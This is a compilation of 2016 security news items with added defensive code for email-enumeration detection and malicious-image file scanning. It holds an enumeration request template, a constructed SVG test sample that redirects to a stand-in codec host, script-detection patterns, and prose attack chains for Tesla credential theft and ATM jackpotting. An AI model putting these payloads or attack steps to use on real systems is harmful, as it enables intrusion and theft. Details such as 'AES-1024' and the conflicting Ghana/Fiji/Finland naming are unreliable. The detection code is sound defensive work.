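    shortcut = protect_with_shortcut("correct horse battery", iterations=20_000)
    rate_full = checks_per_second(verify_full, full)
    rate_short = checks_per_second(verify_shortcut, shortcut)
    print(f"full verifier:     {rate_full:12.0f} checks/s")
    print(f"shortcut verifier: {rate_short:12.0f} checks/s ({rate_short / rate_full:.0f}x faster)")
```

The design lesson is that a format must not offer any verification path cheaper than the intended one; a "fast reject" that saves the legitimate owner a few milliseconds saves the cracker the same amount on every guess.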

That being said, Google’s highly anticipated and heavily promoted Pixel has already been hacked–by a team of Chinese hackers at the 2016 PwnFest. It took the hackers less than a minute to hack the phone. Google is working on a patch for the vulnerability.

Frustrated with Google’s seeming resistance to providing ample security measures on Android phones, The Tor Project recently announced the release of its prototype for a Tor-enabled smartphone. Ars Technica describes it as “an Android phone beefed up with privacy and security in mind, and intended as equal parts opsec kung fu and a gauntlet to Google.”


Designed by Tor developer Mike Perry, it is based on Copperhead OS, a hardened Android distribution.

Copperhead OS was the obvious choice for the prototype’s base system, Perry explained to Ars Technica. “Copperhead is also the only Android ROM that supports verified boot, which prevents exploits from modifying the boot, system, recovery, and vendor device partitions,” he said in a blog post. “Copperhead has also extended this protection by preventing system applications from being overridden by Google Play Store apps, or from writing bytecode to writable partitions (where it could be modified and infected).”

Ars Technica reports:

“’The prototype is meant to show a possible direction for Tor on mobile,’ Perry wrote in a blog post. ‘We are trying to demonstrate that it is possible to build a phone that respects user choice and freedom, vastly reduces vulnerability surface, and sets a direction for the ecosystem with respect to how to meet the needs of high-security users.’

To protect user privacy, the prototype runs OrWall, the Android firewall that routes traffic over Tor, and blocks all other traffic. Users can punch a hole through the firewall for voice traffic, for instance, to enable Signal.

The prototype only works on Google Nexus and Pixel hardware, as these are the only Android device lines, Perry wrote, that ‘support Verified Boot with user-controlled keys.’ While strong Linux geekcraft is required to install and maintain the prototype, Perry stressed that the phone is also aimed at provoking discussion about what he described as ‘Google’s increasing hostility towards Android as a fully Open Source platform.’”

Perry argues that in trying to resolve security, Google is encroaching on user civil liberties and causing Android to be more susceptible to compelled backdoors. He is also concerned about the lack of transparency in Google’s release and development process.

Perry has vehemently stated that the Tor Project has no plans to move into the hardware business; he just wants this prototype to inspire innovation. The prototype, nicknamed “Mission Improbable,” can now be downloaded and installed, and the Mission Improbable installation instructions can be accessed on GitHub.

Hacker found issues in Uber UberCENTRAL Tool that exposed user data
26.11.2016 securityaffairs Hacking

Bounty hunter Kevin Roh has discovered several security vulnerabilities in the Uber UberCENTRAL Tool that exposed user data.
Security expert and bounty hunter Kevin Roh has discovered several security vulnerabilities in Uber’s UberCENTRAL Tool that exposed user data.

The UberCENTRAL service was launched in July; according to the company, it is a dashboard that enables any business to request, manage, and pay for multiple Uber rides on behalf of its customers.

The UberCENTRAL console could be used by operators (i.e. employees) who can request rides for their customers. Administrators can easily add operators using only their email address.

Roh described in a blog post the flaws he discovered during his tests.

The first flaw allows enumerating userUUIDs via email addresses: an attacker can send requests with possible email addresses, and if an address is associated with an account, the server includes the user’s UUID in the response.

If the email address is not valid, the response sent by the server contains an error.

Below is an example of a request sent to the server:

POST /admin/api/organizations/[organizationUUID]/operators HTTP/1.1
Host:
Connection: close
Content-Length: 40
Accept: application/json
Origin:
x-csrf-token: XXXX
x-uber-origin: web-central-admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/json
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: _ua=XXXX

{"operatorEmail":"r****"}

The attacker could write a simple script that tries all possible values for the ‘operatorEmail’ parameter and analyzes the response received from the server for each of them.


The second flaw is similar to the first one; it allows enumerating userUUIDs via a GET request instead of via email addresses.

Roh found a third flaw that could have been exploited to obtain much more data, including full name, phone numbers, emails and userUUID.
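What made the first flaw an enumeration oracle is that the server's answer depended on whether the email address existed. As an added example (not Uber's code), the block below places that leaky handler beside a uniform-response version that returns the same status and body either way, and adds a log check that flags a client submitting many distinct addresses to the operator endpoint. The account directory, the log line format, the endpoint handler names and the sample log are constructed assumptions.

```python
"""
Added example (not Uber's code): the enumeration oracle described in the
article, its uniform-response counterpart, and a log check that spots a
sweep of candidate addresses. Function names, the account directory and
the log format are assumptions.
"""
from collections import defaultdict
import re
import uuid

# Constructed account directory standing in for the real user store.
KNOWN_USERS = {
    "alice@example.com": uuid.UUID("11111111-1111-4111-8111-111111111111"),
    "bob@example.com": uuid.UUID("22222222-2222-4222-8222-222222222222"),
}

# Internal side effects (invitation or sign-up mail) are queued here, never exposed.
OUTBOX = []


def add_operator_leaky(email: str) -> dict:
    """The oracle pattern: the response itself reveals whether the address exists."""
    if email in KNOWN_USERS:
        return {"status": 200, "body": {"userUUID": str(KNOWN_USERS[email])}}
    return {"status": 404, "body": {"error": "unknown user"}}


def add_operator_uniform(email: str) -> dict:
    """Hardened: identical status and body whether or not the address is known.

    A known user is invited and an unknown one gets a sign-up message, but
    both happen out of band, so the HTTP response carries no identifier and
    no error that distinguishes the two cases.
    """
    OUTBOX.append(("invite" if email in KNOWN_USERS else "signup", email))
    return {"status": 202, "body": {"message": "If the address is eligible, an invitation has been sent."}}


# Constructed access-log format: client, method, path, status, submitted e-mail.
LOG_LINE = re.compile(
    r"^(?P<ip>\S+) POST /admin/api/organizations/(?P<org>[^/]+)/operators "
    r"(?P<status>\d{3}) email=(?P<email>\S+)$"
)


def find_enumeration(log_lines, threshold: int = 20) -> dict:
    """Return {client_ip: distinct_addresses} for clients that submitted more
    than `threshold` distinct e-mail addresses to the operator endpoint.
    Counting distinct addresses rather than requests keeps an administrator
    who retries one invitation from tripping the check."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m:
            seen[m["ip"]].add(m["email"].lower())
    return {ip: len(addrs) for ip, addrs in seen.items() if len(addrs) > threshold}


# Constructed sample log: an administrator inviting two colleagues, and one
# client walking a list of candidate addresses.
SAMPLE_LOG = [
    "203.0.113.5 POST /admin/api/organizations/org-1/operators 202 email=alice@example.com",
    "203.0.113.5 POST /admin/api/organizations/org-1/operators 202 email=bob@example.com",
] + [
    f"198.51.100.9 POST /admin/api/organizations/org-1/operators 202 email=user{i}@example.com"
    for i in range(25)
]

if __name__ == "__main__":
    print(add_operator_leaky("alice@example.com"), add_operator_leaky("nobody@example.com"))
    print(add_operator_uniform("alice@example.com") == add_operator_uniform("nobody@example.com"))
    print(find_enumeration(SAMPLE_LOG))
```

The uniform handler removes the oracle entirely; the log check is the compensating control for endpoints where a uniform answer is not possible, and the threshold should be set from the normal number of invitations an administrator sends.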

The vulnerabilities were reported to the company between September and October, and the company promptly patched them in October.

Uber rewarded Roh under the company’s bug bounty program. The hacker received hundreds of dollars for each of the vulnerabilities; the exact amounts have not been revealed.

ImageGate: a new method of spreading malware via images

26.11.2016 SecurityWorld Viruses
Check Point Software Technologies has identified a new attack vector, named ImageGate, which embeds malware in image and graphic files. Moreover, the researchers have uncovered how hackers spread malicious code using these images on social networks such as Facebook and LinkedIn.

According to the research, the attackers have created a new technique for embedding malicious code in an image file and successfully uploading it to social network websites. The attackers exploit misconfigurations in the social media infrastructure to force victims to download the image file. As soon as the end user clicks on the downloaded file, the device is infected.

Over the past four days the entire security industry has been closely watching the massive spread of the Locky ransomware via social networks, especially via the Facebook campaign. Check Point believes that the new ImageGate technique reveals how this campaign was possible at all, which until now has been an unanswered question.

Check Point researchers uncovered an attack that affects major websites and social networks around the world, including Facebook and LinkedIn. Check Point informed Facebook and LinkedIn about the attack at the beginning of September.

In the case of the Locky ransomware, as soon as the user downloads and opens the malicious file, all files on their personal device are automatically encrypted and access to them can only be regained by paying a ransom. According to estimates, the attack campaign is still in full swing and new victims are added every day.

“More and more people are spending time on social networks, so hackers are trying to find a way into exactly these platforms,” says Oded Vanunu, head of products vulnerability research at Check Point. “Cybercriminals are well aware that these sites are usually allowed, so they are trying to find new techniques for using social media for malicious activities. Check Point researchers are trying to find out where the attackers will strike next, in order to protect users from the most advanced threats.”

How to protect yourself:

Check Point recommends the following preventive measures:

If you clicked on an image and your browser started downloading a file, do not open it. Any social network website should display the image without downloading any file.
Do not open any image file with an unusual extension (such as SVG, JS or HTA).

Beware! Malicious JPG Images on Facebook Messenger Spreading Locky Ransomware
26.11.2016 thehackernews
If you receive an image file sent by someone, even your friend, on your Facebook Messenger, LinkedIn or any other social media platform, just DO NOT CLICK ON IT.
Even a JPG image file could eventually infect your computer with the infamous Locky Ransomware.
Earlier this week, we reported a new attack campaign that used Facebook Messenger to spread Locky Ransomware via .SVG image files, although Facebook denied this was the case.
Now, researchers have discovered that the ongoing spam campaign is also using boobytrapped .JPG image files in order to download and infect users with the Locky Ransomware via Facebook, LinkedIn, and other social networking platforms.
Security researchers from Israeli security firm Check Point have reportedly discovered how cyber criminals are hiding malware in image files, and how they are executing the malware code within these images to infect social media users with Locky variants.
According to researchers, malware authors have discovered security vulnerabilities in Facebook and LinkedIn that force the download of a maliciously crafted image file onto a user's computer, though in some cases the user has to click on the image file to download it.
When the user notices the automatic download and opens that malformed image file, malicious code installs the Locky ransomware onto the user's computer, which encrypts all files on the infected computer until a ransom is paid.
Flaws in Facebook and LinkedIn Remain Unpatched
The security firm has declined to provide technical details as the vulnerability the malware relies on still impacts both Facebook and LinkedIn, among other unnamed web services.
"The attackers have built a new capability to embed malicious code into an image file and successfully upload it to the social media website," Check Point researchers say.
"The attackers exploit a misconfiguration on the social media infrastructure to deliberately force their victims to download the image file. This results in infection of the users' device as soon as the end-user clicks on the downloaded file."
CheckPoint says the firm reported the issue to both Facebook and LinkedIn back in September, but the vulnerabilities remain unpatched on both platforms and are now being actively exploited by attackers.
Video Demonstration of the Attack
You can also watch the video demonstration of this attack, dubbed ImageGate by CheckPoint, which shows the attack in action.

Locky is Spreading Massively via Social Media Platform
Locky ransomware has been around since early this year and has become the biggest and most common ransomware family known today. It works by encrypting victims' files with RSA-2048 and AES-1024 algorithms and demands a ransom for the key.
Locky ransomware mainly spreads via phishing emails containing a malicious attachment disguised as a Word or Zip file. But since people spend time on social network sites, cyber crooks have turned their focus to finding a way into these platforms.
Check Point says that in the past week, they have noticed a "massive spread of the Locky ransomware via social media, particularly in its Facebook-based campaign."
To keep yourself safe, you are advised not to open any unsolicited file that has automatically downloaded onto your computer, especially image files with unusual extensions like SVG, JS, or HTA.
The bottom line: don't be curious to look at an image sent by someone, at least for the time being.
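Both the Check Point advisory and this write-up end with the same rule: do not open a downloaded file that arrived as an image and carries an extension such as SVG, JS or HTA, and distrust any download that a social network should have rendered inline. That rule can be applied mechanically by a download filter or mail gateway. The block below is an added example, not Check Point's or The Hacker News' code: it compares a file's extension with its leading bytes, using the standard magic numbers for raster formats, and classifies script extensions, markup content and signature mismatches separately. The file names and contents are constructed; the function names and the extension lists are assumptions.

```python
"""
Added example (not Check Point's code): a mechanical version of the
"unusual extension" advice. Signatures are the standard magic numbers;
file names and contents are constructed for the example.
"""
import os

# Magic numbers of the raster formats a social network renders inline.
RASTER_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".bmp": (b"BM",),
}

# Extensions that are script or markup, never a picture, whatever the icon suggests.
SCRIPT_OR_MARKUP_EXTENSIONS = {".svg", ".js", ".jse", ".hta", ".html", ".htm", ".vbs", ".wsf"}

# Leading bytes that identify markup or script regardless of the extension.
MARKUP_PREFIXES = (b"<?xml", b"<svg", b"<html", b"<!doctype", b"<script")


def classify_download(filename: str, head: bytes) -> str:
    """Classify a downloaded 'image' from its name and first bytes.

    Returns one of:
      'script-extension'   name ends in SVG/JS/HTA/... (also catches photo.jpg.hta)
      'markup-content'     the bytes are XML/HTML/script whatever the name says
      'unknown-extension'  not a raster format this filter vouches for
      'content-mismatch'   raster extension, but the bytes do not match its magic number
      'ok'                 extension and magic number agree
    """
    ext = os.path.splitext(filename.lower())[1]
    if ext in SCRIPT_OR_MARKUP_EXTENSIONS:
        return "script-extension"
    if head.lstrip()[:16].lower().startswith(MARKUP_PREFIXES):
        return "markup-content"
    if ext not in RASTER_SIGNATURES:
        return "unknown-extension"
    if not head.startswith(RASTER_SIGNATURES[ext]):
        return "content-mismatch"
    return "ok"


def classify_file(path: str, probe: int = 512) -> str:
    """Same check against a file on disk, reading only its first bytes."""
    with open(path, "rb") as f:
        return classify_download(path, f.read(probe))


# Constructed downloads: one genuine photo and four files dressed up as pictures.
SAMPLE_DOWNLOADS = {
    "holiday.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    "holiday.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><script>/* ... */</script></svg>',
    "holiday.jpg.hta": b'<html><head><script language="vbscript">\' ...</script>',
    "holiday.png": b"\n<html><body>not a picture</body></html>",
    "holiday.gif": b"MZ\x90\x00\x03\x00\x00\x00",
}


def triage(downloads: dict) -> dict:
    """Map each download to its classification; anything but 'ok' is quarantined."""
    return {name: classify_download(name, head) for name, head in downloads.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_DOWNLOADS).items():
        print(f"{name:18} {verdict}")
```

The check is deliberately conservative: an unknown extension is reported rather than passed, and markup content is flagged before the extension is consulted, so an HTML or SVG payload renamed to .png is still caught.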

Kapustkiy joins the Powerful Greek Army and hacked High Commission of Ghana & Fiji in India
26.11.2016 securityaffairs Hacking
Kapustkiy hacked the High Commission of Ghana & Finland in India; he also confirmed that he has joined the Powerful Greek Army hacker crew.
Last week, the hacker Kapustkiy, one of the most active hackers at this moment, hacked the India Regional Council; today he sent me a message announcing that he had hacked the High Commission of Ghana & Finland in India.

The hacked archives are: Database: jadon_ghana, Database: jadon_hcfiji

The hacker found more SQLi flaws in the above websites and a way to exploit them to access their databases. The databases contain users’ personal information, including real names, phone numbers and email addresses.

Among the first hacks of Kapustkiy are the data breaches of Indian embassies across the world; a few weeks later the young hacker decided to verify whether the flaws had been fixed after his disclosure.

“I was curious about the Indian Embassy if they had fix everything that they promised to me. So I’ve found two sites that were related to the Indian Embassy” he told me.

Kapustkiy published a small portion of the compromised databases on Pastebin. The hacker announced that he is now a member of the Powerful Greek Army hacker group.

Below the manifesto published by the hacker:

“DISCLAIMER: Don’t leak this somewhere else and don’t claim that it is your work

And don’t abuse this information. This is only to let administrators to see the danger of a weak website with no security and what the consequence are. I have reported the vulnerable.

Contact them about the vulnerability please: &”

Kapustkiy is a seventeen-year-old pentester who is targeting organizations and embassies across the world. Recently he breached the ‘Dipartimento della Funzione Pubblica’ Office of the Italian Government and the Paraguay Embassy of Taiwan (, and a few days ago the hacker and his friend Kasimierz (@Kasimierz_) hacked the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya.

He also targeted universities, including two subdomains of Virginia University & a subdomain of the University of ( ), and another embassy, the Indian Embassy in New York ( ).

The Indian authorities have issued a public statement to thank the young hacker for exposing the vulnerabilities in their websites.

“Thank you for your advice,” said Sanjay Kumar Verma, Joint Secretary, eGovernance and Information Technology. “We are fixing codes one by one. Your help in probing websites of various Indian embassies is a great help.”

The administrators of the Italian website also thanked him.

A massive DDoS attack hit the servers of the European Commission for several hours

25.11.2016 securityaffairs Attack

The European Commission was the victim of a massive DDoS attack that brought down its internet access for hours on Thursday.
A massive DDoS attack targeted the European Commission website; fortunately, according to an official statement from the organization, the internal security team repelled the attack without damage.

The experts from the European Commission confirmed that some servers hit by the DDoS attack went offline causing an outage that lasted a few hours.

The European Commission informed internal staff of the attack via email and it explained that the malicious volume of traffic caused “the saturation of our Internet connection.”

“No data breach has occurred,” a Commission spokesperson was quoted by Politico. “The attack has so far been successfully stopped with no interruption of service, although connection speeds have been affected for a time.”

Employees claim Internet was down following the attacks

The attack occurred yesterday and according to an employee, the internal staff was not able to work during the afternoon.

“no one could work this afternoon, since the Internet was gone twice, for several hours.” said the source.

At the time of writing there are no technical details of the DDoS attack; those responsible are still unknown, as is the motivation behind the offensive.

The European Commission is currently investigating the case.

Insiders confirmed that security experts at the European Commission expect new waves of cyber attacks in the coming days. The European cyber emergency response team (CERT-EU) has already been alerted and is working with the IT security team at the European Commission to repel any attack.

The aforementioned source notes that in addition to the traffic that hackers directed at the EU website, the Commission also experienced attacks specifically aimed at network gateways, and this is the main reason the Internet connections used by employees went down.

Crooks steal millions from European ATMs with jackpotting attacks
25.11.2016 securityaffairs Hacking

Criminal gangs like the Cobalt gang are now focusing their efforts on the banks to steal cash directly from the ATMs with jackpotting attacks.
Security experts are observing a change of tactics by the criminal organizations that target ATMs and online banking credentials. Crooks are now focusing their efforts on the banks in an attempt to steal cash directly from the ATMs.

In recent months, cyber criminals targeted ATMs in Taiwan and Thailand; in both cases, crooks used malware to infect the machines and instructed them to spit out cash on demand. The principal ATM manufacturers, Diebold Nixdorf and NCR Corp., confirmed that they are aware of the ATM attacks and have already been working with their customers to mitigate the threat.

“We have been working actively with customers, including those who have been impacted, as well as developing proactive security solutions and strategies to help prevent and minimize the impact of these attacks,” said Owen Wild, NCR’s global marketing director for enterprise fraud and security.

This technique is known as ATM jackpotting, the FBI has warned U.S. banks of the potential attacks.

The FBI confirmed in a bulletin earlier this month that it is “monitoring emerging reports indicating that well-resourced and organized malicious cyber actors have intentions to target the U.S. financial sector.”

According to law enforcement, the malware used in the attack could be a product of the Buhtrap ATM gang, which stole 1.8 Billion rubles ($28 Million) from Russian banks between August 2015 and January 2016.

The cyber security firm Group-IB, which investigated the string of ATM jackpotting attacks, confirmed that cyber criminals have remotely infected ATMs with malware in more than a dozen countries across Europe this year. The names of the targeted banks were not disclosed, but the researchers confirmed that the victims were located in Armenia, Bulgaria, Estonia, Georgia, Belarus, Kyrgyzstan, Moldova, Spain, Poland, the Netherlands, Romania, the United Kingdom, Russia, and Malaysia.
According to Group-IB, crooks have been targeting ATMs for at least five years, but the recent wave of attacks mostly targeted small numbers of ATMs because criminals need physical access to the machines.

“To perform a logical attack, hackers access a bank’s local network, which is further used to gain total control over ATMs in their system. Cash machines are then remotely triggered to dispense money, allowing criminals to steal large amounts with relative ease. With full control over ATMs, criminals can choose the exact attack time to loot newly filled ATMs.” states the report from Group-IB. “This results in millions of dollars lost, as in the case of the First Bank. That said, such attacks do not require developing expensive advanced software – a significant amount of tools used by the hackers is widely available from public sources, as will be further covered later in this report. ”

Group-IB attributed the attacks against the ATMs across Europe to a single criminal group, dubbed Cobalt.

The group launched spear phishing attacks with a malicious attachment in order to infect systems in the target banks. The emails purport to come from the European Central Bank, the ATM maker Wincor Nixdorf, or other banks.

“Criminals send emails with attachments containing exploits and password-protected archives with executable files. In the attacks, phishing emails were sent from virtual servers, which had installed an anonymous mailing script “yaPosylalka v.2.0” (another name of the service is “alexusMailer v2.0”) developed by Russian-speaking cyber-criminals.” continues Group-IB.

The criminal gang uses Cobalt Strike, a legitimate program designed for penetration testing, and the Mimikatz tool to compromise domain and local accounts.


The researchers from Group-IB believe that the Cobalt gang is linked to Buhtrap:

“Group-IB specialists believe that just after the arrest of the Buhtrap group in May their botnet was sold to other criminals who are continuing its use to steal money from corporate accounts. That said, according to our analysis of Cobalt attacks on ATMs of Russian and European banks, the methods used by criminals to deliver phishing emails and obtain control over a domain controller are identical to those used by the Buhtrap group. Purportedly, at least a part of the Buhtrap group became Cobalt members, or more likely Buhtrap core members shifted their focus to attacks on ATMs. ” explains Group-IB.

I suggest reading the Group-IB report on the Cobalt gang; it is full of details that are very useful for preventing such attacks.

ImageGate attack – How to spread malware via poisoned .JPG
25.11.2016 securityaffairs

Security experts from Checkpoint have discovered a new malware-based campaign through Facebook leveraging an image obfuscation trick dubbed ImageGate.
Security experts from Checkpoint have discovered a new malware-based campaign through Facebook. Crooks leverage an image obfuscation trick, dubbed ImageGate, to spread the Locky ransomware via Facebook. Experts highlighted that the image obfuscation trick is able to bypass Facebook’s security checks.
“Check Point researchers identified a new attack vector, named ImageGate, which embeds malware in image and graphic files. Furthermore, the researchers have discovered the hackers’ method of executing the malicious code within these images through social media applications such as Facebook and LinkedIn.” reads a blog post published by Checkpoint security.

Checkpoint hasn’t disclosed the details of the technique because it could still have a serious impact on popular web services, including Facebook and LinkedIn.

According to the researchers, the attackers have devised a method to embed malicious code into an image file and successfully upload it to the social media platform, bypassing security controls.

“The attackers exploit a misconfiguration on the social media infrastructure to deliberately force their victims to download the image file. This results in infection of the users’ device as soon as the end-user clicks on the downloaded file.” continues the analysis of the ImageGate.

The technique is not particularly insidious for tech-savvy users; still, it represents a serious threat to users who could be tricked into downloading and running unknown executables.
Researchers Roman Ziakin and Dikla Barda from Checkpoint published a video PoC showing how the issue is exploited by sending a .jpg image file through Facebook Messenger.

The attack requires user interaction: the victim must click the attachment, after which the target system shows a Windows save-file prompt asking for the directory to which the .hta file will be downloaded. The victim is infected with the Locky ransomware by double-clicking the saved file.


Until Facebook improves its controls, users are advised to stay vigilant and avoid opening unsolicited messages.

Check Point recommends the following preventive measures:

If you have clicked on an image and your browser starts downloading a file, do not open it. Any social media website should display the picture without downloading any file.
Don’t open any image file with an unusual extension (such as SVG, JS or HTA).
A few days ago, researchers announced the discovery of a new hacking campaign leveraging Facebook Messenger to spread the Locky ransomware via SVG images.
The Locky ransomware is spread via a downloader; experts noticed that it is able to bypass Facebook’s defense measures by pretending to be a harmless image file.

The campaign was first spotted during the weekend by the malware expert Bart Blaze and by the researcher Peter Kruse.

“Earlier today, a friend of mine notified me of something strange going on with his Facebook account; a message containing only an image (an .svg file in reality) had been sent automatically, effectively bypassing Facebook’s file extension filter:” wrote Bart Blaze in a blog post.

When the victim opens the malicious SVG file, they are redirected to a website that resembles YouTube in design only; once the page loads, the victim is asked to install a codec in order to play the video shown on the page.

“A website purporting to be Youtube, with a video from Facebook – of course, you needed to install an additional extension to view it :)” continues Bart Blaze.

If the victim installs the Chrome extension as requested on the page, the attack is then spread further via Facebook Messenger. The experts observed that sometimes the malicious Chrome extension installs the Nemucod downloader, which launches the Locky ransomware attack.
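Both campaigns above rely on a file that is named like a picture but is really an HTA or a scripted SVG, so the defensive check is to identify the content by its bytes rather than by its name. The following is an added example, not code from Check Point or Bart Blaze; the sample files are constructed inline and the extension and marker lists are our own assumptions.

```python
"""Inspect a 'picture' attachment: sniff the real content type, compare it
with the extension, and look for script or remote references inside SVG/HTML.

Added example, not Check Point or Bart Blaze code. Sample files below are
constructed stand-ins, not real malware."""
import os
import re

# Magic bytes of the image formats a social-media upload is expected to be.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# What the bytes should decode to for a given extension.
EXPECTED_KIND = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png",
                 ".gif": "gif", ".svg": "svg"}

# Extensions Check Point calls unusual for an image, plus other Windows script
# hosts (the set itself is our assumption, not from the report).
ACTIVE_CONTENT_EXT = {".svg", ".js", ".hta", ".vbs", ".wsf", ".jse"}

# Markers of executable or remote content inside SVG/HTML text.
SCRIPT_PATTERNS = {
    "script element": re.compile(rb"<script\b", re.I),
    "event handler": re.compile(rb"\bon(?:load|click|error|begin|end|mouseover)\s*=", re.I),
    "javascript: URL": re.compile(rb"javascript:", re.I),
    "embedded document": re.compile(rb"<(?:iframe|object|embed|foreignObject)\b", re.I),
    "remote reference": re.compile(rb"(?:xlink:)?href\s*=\s*[\"'](?:https?:)?//", re.I),
}


def sniff(data: bytes) -> str:
    """Identify the content by its bytes, ignoring the file name."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    head = data[:4096]
    if re.search(rb"<svg\b", head, re.I):
        return "svg"
    # An .hta is plain HTML that Windows hands to mshta.exe, so it sniffs as HTML.
    if re.search(rb"<!doctype html|<html\b|<hta:application\b|<script\b", head, re.I):
        return "html_like"
    return "unknown"


def assess(filename: str, data: bytes) -> dict:
    """Return a verdict: block (content mismatch or active content),
    warn (unusual extension only) or allow."""
    ext = os.path.splitext(filename)[1].lower()
    kind = sniff(data)
    block, warn = [], []
    expected = EXPECTED_KIND.get(ext)
    if expected and kind != expected:
        block.append(f"extension {ext} but content sniffs as {kind}")
    if kind in ("svg", "html_like"):
        hits = [name for name, pat in SCRIPT_PATTERNS.items() if pat.search(data)]
        if hits:
            block.append("active content: " + ", ".join(hits))
    if ext in ACTIVE_CONTENT_EXT:
        warn.append(f"unusual extension for an image: {ext}")
    verdict = "block" if block else ("warn" if warn else "allow")
    return {"file": filename, "content": kind, "verdict": verdict,
            "reasons": block + warn}


# Constructed samples (no real payloads).
SAMPLES = {
    # Genuine JPEG header, truncated.
    "holiday.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
    # HTML/HTA shape hidden behind a .jpg name.
    "photo_2016.jpg": b"<html><head><hta:application id='x'/></head>"
                      b"<body><script>/* constructed placeholder */</script></body></html>",
    # SVG whose onload handler sends the browser to a fake video page.
    "video.svg": b'<svg xmlns="http://www.w3.org/2000/svg" '
                 b'onload="location=\'http://fake-codec.invalid/\'"/>',
    # Harmless SVG logo.
    "logo.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>',
}


def scan_all(samples=SAMPLES) -> dict:
    """Verdict per sample file name."""
    return {name: assess(name, data)["verdict"] for name, data in samples.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        r = assess(name, data)
        print(f"{name:15} {r['content']:10} {r['verdict']:6} {'; '.join(r['reasons'])}")
```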

How to steal a Tesla car by hacking the mobile app

25.11.2016 securityaffairs Hacking

A group of researchers from the security firm Promon has demonstrated how cyber criminals could take control of the Tesla Car and steal it.
A group of security experts from security firm Promon has demonstrated how to exploit the Tesla app (for both Android and iOS) to locate, unlock and steal a Tesla Model S. The hackers used a laptop to remotely control the vehicle as demonstrated in the following video PoC.

“Our researchers have demonstrated that because of lack of security in the Tesla smartphone app, cyber criminals could take control of the company’s vehicles, to the point where they can track and locate the car in real-time, and unlock and drive the car away unhindered.” reads a blog post published by the Promon firm.


The Tesla app implements numerous functions: it allows the owner to check the battery level, locate the car, set the climate control and flash the lights.

The app performs these operations by sending HTTP requests to the Tesla server; the requests carry an OAuth token for authentication. The user obtains the token once they have authenticated with their username and password.

The experts noticed that the first time the user logs into the Tesla app, the mobile device receives a token that is stored in cleartext in a file in the app’s sandbox folder. Every time the app is restarted, the token is read and used for subsequent requests.

Attackers can steal it to impersonate the victim and access the vehicle.

“In our tests, this token was valid for 90 days, meaning that the user has to re-enter his username and password once in a while. Stealing this token enables an attacker to locate the car and open its doors. In order to enable keyless driving, the password is required as well. Because of that, the hack focused on obtaining the username and password.” continues the analysis.

There are several methods to steal the login credentials; in their test the hackers used a modified Tesla app that includes code to steal the username and password and send them to the attacker.

In order to replace the Tesla app and manipulate the token, the attackers used a privilege escalation attack.

When the Tesla car owner connects to the bogus Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners.

“In this example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed.” state the experts.

Once the Tesla owner has installed and started the malicious app, it will then gain root permissions and replace the legitimate Tesla app. When the user starts the app the next time, he will be prompted to provide his login credentials that the Tesla app will send back to the attacker.

The attackers have to trick the Tesla owner into installing this malicious app, for example through a phishing attack.

In a first step, the hackers have to convince the owner to download a malicious app onto their smartphone. The hackers set up a free and open Wi-Fi hotspot in proximity to a Tesla charging station, which offers a free burger to Tesla owners who download a special app. Of course, the attackers could use various incentives to trick users into downloading the malicious app.

“At this point the target knows nothing about the free burger app’s true intentions, but now the hackers have access to the Tesla app, they can track the car. Once parked up for the night, they can track down the car, instruct it to unlock (a feature of the app), then enable ‘keyless driving’ mode. Created by Tesla, this feature lets Tesla owners remotely unlock and start their cars by entering a password; this can come in handy when asking a neighbour to move the car to a different parking space while you are on holiday, for example.”

It is important to highlight that the hack isn’t related to a flaw in the Tesla car; a Tesla spokesperson told IBTimes UK that the report does not demonstrate any Tesla-specific vulnerabilities.

“Mobile-focused criminals are more skilled than ever before, and are using a lack of security in mobile apps as an increasingly lucrative source of revenue.” said Tom Lysemose Hansen, founder and chief technology officer of Promon.

“Remotely controlling and stealing Tesla cars is a particularly dangerous example of just what can be done, but in theory any app without the necessary protection in place could be affected.”

Caribbean scuba diving with IT-security in mind
25.11.2016 Kaspersky Security
Dare to submit your research proposal before December 1, 2016 to dive into undiscovered and uncharted cybercrimes, hacks, espionage and much more at the Security Analyst Summit – April 2-6, 2017 on the Caribbean island of St. Maarten.

There are four months left before Kaspersky Lab’s Security Analyst Summit on the Caribbean Island of St Maarten, an invitation-only conference. If you still haven’t submitted your individual proposal, you’d better hurry up. There’s only one week left before the SAS17 program committee will start evaluating the abstracts. The summit will welcome those with new studies and tools, vulnerability reports, creative ideas, concepts or their results; insights into nation state cyber-espionage and government surveillance; research into attacks against financial institutions and critical infrastructure; and observations on the mobile systems and IoT cyber risk landscape.

You’ll join the leading voices in the IT security industry – the chosen few – for knowledge and information sharing: senior executives from business organizations, global law enforcement agencies and CERTs, independent researchers and journalists. Previous events were joined by members of leading global companies, such as Samsung, Adobe, Microsoft, BlackBerry, CISCO, Boeing, Interpol, the World Bank, Team Cymru, The ShadowServer Foundation, ICSA Labs and Fidelis Cybersecurity Solutions. And every year SAS proves that IT security has no borders.

Requirements for submissions:

Individual proposals should be no more than 350 words in length. SAS has a ground rule: nobody gets to speak from the stage for more than 30 minutes — this is the longest duration allowed for a keynote presentation — while everyone else gets 20 minutes maximum.
Proposals should include the title of the paper and should clearly spell out the focus and goal of the presentation.
